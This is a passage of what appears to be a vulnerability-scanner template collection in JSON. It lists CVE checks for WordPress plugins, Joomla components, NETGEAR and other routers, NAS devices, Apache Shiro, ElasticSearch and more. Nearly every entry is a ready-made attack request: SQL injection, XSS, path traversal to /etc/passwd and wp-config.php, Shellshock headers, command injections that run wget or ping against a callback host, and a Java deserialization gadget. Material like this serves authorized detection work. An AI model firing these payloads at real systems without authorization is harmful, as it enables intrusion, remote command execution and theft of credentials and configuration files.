/wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200","contains(body_2, \"[zm_gallery id=\")","contains(body_2, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")","!contains(body_3, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")"],"condition":"and"}]}]},{"id":"CVE-2016-3978","info":{"name":"Fortinet FortiOS  - Open Redirect/Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redir=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2016-5649","info":{"name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /BSW_cxttongr.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Smart Wizard Result</title> "]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<b>Success \"([a-z]+)\""],"part":"body"}]}]},{"id":"CVE-2016-1555","info":{"name":"NETGEAR WNAP320 Access Point Firmware - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /boardDataWW.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmacAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2016-1000132","info":{"name":"WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4437","info":{"name":"Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: rememberMe={{base64(concat(base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"),aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"kPH+bIxk5D2deZiIxcaaaA==\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"))))}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2016-1000140","info":{"name":"WordPress New Year Firework <=1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000142","info":{"name":"WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000128","info":{"name":"WordPress anti-plagiarism <=3.60 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000154","info":{"name":"WordPress WHIZZ <=1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4977","info":{"name":"Spring Security OAuth2 Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unsupported response types: [978015547]"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2016-1000131","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6277","info":{"name":"NETGEAR Routers - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000138","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7552","info":{"name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/logoff.cgi"],"headers":{"Cookie":"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Memory map"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000146","info":{"name":"WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-2389","info":{"name":"SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10108","info":{"name":"Western Digital MyCloud NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"WDMyCloud\")","contains(interactsh_protocol, \"dns\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2008-4764","info":{"name":"Joomla! <=2.0.0 RC2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-7269","info":{"name":"UC Gateway Investment SiteEngine v5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api.php?action=logout&forward=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-6172","info":{"name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6222","info":{"name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6465","info":{"name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webshell4/login.php?errcode=0&login=\\%22%20onfocus=alert(document.domain);%20autofocus%20\\%22&err=U"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\" onfocus=alert(document.domain); autofocus","Please enter login name &amp; password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2398","info":{"name":"AppServ Open Project <=2.5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=confirm('xss')>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1061","info":{"name":"WordPress Sniplets <=1.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6668","info":{"name":"nweb2fax <=0.2.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd","{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1059","info":{"name":"WordPress Sniplets 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6080","info":{"name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6982","info":{"name":"Devalcms 1.4a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sub menu for: <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2008-5587","info":{"name":"phpPgAdmin <=4.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4668","info":{"name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2650","info":{"name":"CMSimple 3.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1547","info":{"name":"Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/exchweb/bin/redir.asp?URL=https://interact.sh","{{BaseURL}}/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-4592","info":{"name":"WP Planet <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["WP Planet"]},{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2962","info":{"name":"Belkin N150 Router 1.00.08/1.00.09 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3206","info":{"name":"Seagate BlackArmor NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"unsafe":true,"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2014-4535","info":{"name":"Import Legacy Media <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4942","info":{"name":"WordPress EasyCart <2.0.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2014-6271","info":{"name":"ShellShock - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/cgi-bin/status","{{BaseURL}}/cgi-bin/stats","{{BaseURL}}/cgi-bin/test","{{BaseURL}}/cgi-bin/status/status.cgi","{{BaseURL}}/test.cgi","{{BaseURL}}/debug.cgi","{{BaseURL}}/cgi-bin/test-cgi"],"stop-at-first-match":true,"headers":{"Shellshock":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Cookie":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2383","info":{"name":"Dompdf < v0.6.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/pdf","filename=\"dompdf_out.pdf\""],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8676","info":{"name":"Simple Online Planning Tool <1.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8682","info":{"name":"Gogs (Go Git Service) - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"ok\":true","\"data\"","\"repolink\":\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9606","info":{"name":"Netsweeper 4.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9094","info":{"name":"WordPress DZS-VideoGallery Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4513","info":{"name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</textarea></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5368","info":{"name":"WordPress Plugin WP Content Source Control - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-1203","info":{"name":"Eyou E-Mail <3.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntype='|cat /etc/passwd||'\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9607","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9444","info":{"name":"Frontend Uploader <= 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4210","info":{"name":"Oracle Weblogic - SSRF in SearchPublicRegistries.jsp","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9617","info":{"name":"Netsweeper 3.0.6 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-9615","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2908","info":{"name":"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9119","info":{"name":"WordPress DB Backup <=4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4558","info":{"name":"WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3120","info":{"name":"ElasticSearch v1.1.1/1.2 RCE","severity":"medium"},"requests":[{"raw":["POST /_search?pretty HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n    \"size\": 1,\n    \"query\": {\n      \"filtered\": {\n        \"query\": {\n          \"match_all\": {\n          }\n        }\n      }\n    },\n    \"script_fields\": {\n        \"command\": {\n            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"cat /etc/passwd\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"\n        }\n    }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4940","info":{"name":"WordPress Plugin Tera Charts - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-10037","info":{"name":"DomPHP 0.83 - Directory 